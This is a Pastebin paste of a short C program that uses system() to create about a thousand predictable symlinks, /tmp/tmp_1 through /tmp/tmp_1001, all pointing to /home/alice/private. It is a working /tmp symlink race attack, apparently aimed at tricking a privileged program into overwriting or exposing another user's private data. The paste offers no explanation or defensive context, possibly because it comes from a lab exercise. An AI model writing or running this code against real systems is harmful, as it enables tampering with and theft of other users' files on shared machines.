Guest User

Untitled

a guest
Apr 22nd, 2018
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.18 KB | None | 0 0
  1. #include <stdio.h>
  2. int main(){
  3. int i=0;
  4. char str[100];
  5. while(1==1) if(i++<1001){
  6. sprintf(str,"ln -s /home/alice/private /tmp/tmp_%d",i);
  7. system(str);}
  8. else break;
  9. return 0;
  10. }
Add Comment
Please, Sign In to add comment